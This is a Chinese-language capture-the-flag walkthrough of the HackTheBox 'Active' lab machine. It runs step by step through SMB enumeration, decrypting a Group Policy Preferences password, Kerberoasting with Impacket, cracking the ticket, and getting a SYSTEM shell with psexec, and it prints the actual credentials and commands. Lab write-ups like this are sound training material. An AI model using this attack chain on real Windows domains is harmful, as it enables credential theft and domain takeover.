渗透测试靶机练习No.117 HTB:Active

admin 2022年10月6日17:29:19安全文章评论23 views1638字阅读5分27秒阅读模式

渗透测试靶机练习No.117 HTB:Active

靶机信息

靶机地址:

 https://app.hackthebox.com/machines/Active

靶场: HackTheBox.com

靶机名称: Active

难度: 简单

提示信息:

 

目标: user.txt和root.txt

实验环境

 攻击机:Manjaro 10.10.16.3
 
 靶机:10.10.10.100

信息收集

扫描端口

扫描靶机开放的服务端口

 sudo nmap -p- 10.10.10.100

渗透测试靶机练习No.117 HTB:Active

 sudo nmap -sC -sV -p 139,389,445,464,593,636,3268,5722,9389,47001 10.10.10.100 -oN nmap.log

渗透测试靶机练习No.117 HTB:Active

扫描到多个开放端口,先来看看139端口

SMB渗透

检测SMB服务信息

 enum4linux -a 10.10.10.100

渗透测试靶机练习No.117 HTB:Active

发现几个共享目录,更换smbmap检测

 smbmap -H 10.10.10.100

渗透测试靶机练习No.117 HTB:Active

发现共享目录Replication有读取权限,尝试登录搜集信息

 smbclient \10.10.10.100Replication

渗透测试靶机练习No.117 HTB:Active

登录成功,发现文件夹active.htb,将文件夹下载到攻击机

 recurse ON
 prompt OFF
 mget *

渗透测试靶机练习No.117 HTB:Active

下载完成,文件不多,来看一看有哪些文件

渗透测试靶机练习No.117 HTB:Active

在active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml文件中发现账号和加密后的密码

 cat active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

渗透测试靶机练习No.117 HTB:Active

但是不清楚这个密码是用来做什么的,到搜索引擎碰碰运气

渗透测试靶机练习No.117 HTB:Active

通过搜索引擎知道这是GPP组策略密码,可以使用gpp-decrypt解密

 gpp-decrypt -c "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

渗透测试靶机练习No.117 HTB:Active

拿到密码,尝试用账号密码认证搜集SMB信息

 smbmap -H 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18

渗透测试靶机练习No.117 HTB:Active

发现多个可读共享目录,先来看看Users用户目录

 smbclient //10.10.10.100/Users -U SVC_TGS%GPPstillStandingStrong2k18

渗透测试靶机练习No.117 HTB:Active

登录成功,先来看看SVC_TGS文件夹

 cd SVC_TGS
 ls

渗透测试靶机练习No.117 HTB:Active

 cd SVC_TGS
 cd Desktop
 ls
 get user.txt

渗透测试靶机练习No.117 HTB:Active

渗透测试靶机练习No.117 HTB:Active

在SVC_TGS用户的桌面上拿到user.txt,其他共享目录未发现可利用信息

域渗透

通过前面的信息知道这台靶机存在域控,尝试获取域信息

先来绑定hosts

 sudo vim /etc/hosts

渗透测试靶机练习No.117 HTB:Active

使用Impacket中的GetUserSPNs.py脚本获取票据

Impacket下载地址

 https://github.com/SecureAuthCorp/impacket/tree/master/examples
 GetUserSPNs.py active.htb/SVC_TGS -request -save -outputfile user.txt

渗透测试靶机练习No.117 HTB:Active

拿到票据,再来暴破密码

 john user.txt -w=../../Dict/rockyou.txt

渗透测试靶机练习No.117 HTB:Active

拿到密码,再使用Impacket中的psexec.py脚本获取shell

 psexec.py [email protected]

渗透测试靶机练习No.117 HTB:Active

拿到system权限,来找找flag

 cd C:UsersAdministratorDesktop
 type root.txt

渗透测试靶机练习No.117 HTB:Active

拿到root.txt,游戏结束

渗透测试靶机练习No.117 HTB:Active

渗透测试靶机练习No.117 HTB:Active

渗透测试靶机练习No.117 HTB:Active

原文始发于微信公众号(伏波路上学安全):渗透测试靶机练习No.117 HTB:Active

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月6日17:29:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  渗透测试靶机练习No.117 HTB:Active http://cn-sec.com/archives/1334369.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: